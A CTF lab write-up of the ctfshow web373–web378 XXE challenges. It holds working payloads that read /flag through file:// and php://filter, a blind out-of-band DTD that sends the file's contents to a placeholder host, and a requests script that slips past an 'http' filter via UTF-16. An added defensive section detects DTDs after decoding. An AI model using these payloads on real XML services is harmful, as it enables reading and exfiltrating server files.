Web: XXE

Tutorials

Excellent!

Xianzhi (先知)

Yishen (义神)

Exercises

web373

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY words SYSTEM 'file:///flag'>]>
<root>
<ctfshow>&words;</ctfshow>
</root>

web374

Basic blind XXE (out-of-band).

<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/evil.xml">
%dtd;
%send;
]>
The external DTD (evil.xml) referenced above:

<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://xxx/?content=%file;'>"> %payload;

My initial idea was to reach the port directly from the payload entity, but for some reason that failed; you do have to add a separate send entity.

web375

Apparently it also works without the XML declaration?

<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/evil.xml">
%dtd;
%send;
]>

web376

Same as above.

web377

The string "http" is blocked.

Consider sending the body in UTF-16 encoding.

import requests

payload = """
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/evil.xml">
%dtd;
%send;
]>
"""

url = "http://22fab6fe-0959-433a-aa11-15dfd549449c.challenge.ctf.show"

# The body is encoded as UTF-16, so a byte-level filter looking for "http" does not match
res = requests.post(url, data=payload.encode("UTF-16"))
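From the defender's side, the lesson of web373 through web377 is that an XML endpoint must inspect the body as the parser will see it, not as raw bytes. The following is an added example (not code from this writeup or from ctfshow) that decodes the body the way an XML parser would and rejects any document carrying a DTD, so a UTF-16 encoded payload is caught the same as a UTF-8 one; the sample payloads and the hostname are constructed placeholders.

```python
import codecs
import re
import xml.etree.ElementTree as ET

# Constructed samples modeled on the web373/web374 payloads above; the host is a placeholder.
SAMPLE_FILE_XXE = (b"<?xml version='1.0'?>\n<!DOCTYPE root [ <!ENTITY words SYSTEM 'file:///flag'>]>\n"
                   b"<root><ctfshow>&words;</ctfshow></root>")
SAMPLE_BLIND_XXE = (b"<!DOCTYPE root [\n<!ENTITY % dtd SYSTEM \"http://xxx.example/evil.xml\">\n"
                    b"%dtd;\n%send;\n]>\n<root/>")
SAMPLE_BENIGN = b"<root><ctfshow>hello</ctfshow></root>"


def decode_xml_bytes(raw: bytes) -> str:
    """Decode a request body the way an XML parser would, so a UTF-16 document
    (the web377 trick) is inspected as text rather than as raw bytes."""
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16")  # BOM present: what str.encode("UTF-16") produces
    if b"\x00" in raw[:4]:  # NUL bytes in the prolog: BOM-less UTF-16
        return raw.decode("utf-16-be" if raw[0] == 0 else "utf-16-le")
    return raw.decode("utf-8")


# Indicators that a document declares a DTD or entities; a benign API body needs none of them.
_CHECKS = [
    ("doctype", re.compile(r"<!DOCTYPE", re.I)),
    ("entity-declaration", re.compile(r"<!ENTITY", re.I)),
    ("external-entity", re.compile(r"\bSYSTEM\s*['\"]", re.I)),
    ("parameter-entity", re.compile(r"%\w+;")),
]


def xxe_indicators(raw: bytes) -> list:
    """Return the names of the XXE indicators found in the decoded document."""
    text = decode_xml_bytes(raw)
    return [name for name, rx in _CHECKS if rx.search(text)]


def safe_parse(raw: bytes) -> ET.Element:
    """Reject any body that carries a DTD; the parser then never sees an entity to expand."""
    found = xxe_indicators(raw)
    if found:
        raise ValueError("rejected XML body: " + ", ".join(found))
    return ET.fromstring(decode_xml_bytes(raw))
```

A byte-level filter would miss the UTF-16 body because the bytes b"http" never appear in it; decoding first is what makes the check hold.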

web378

<!DOCTYPE user[
<!ENTITY flag SYSTEM "file:///flag">
]>
<user>
<username>
&flag;
</username>
</user>

Summary

Honestly, I still only half understand it...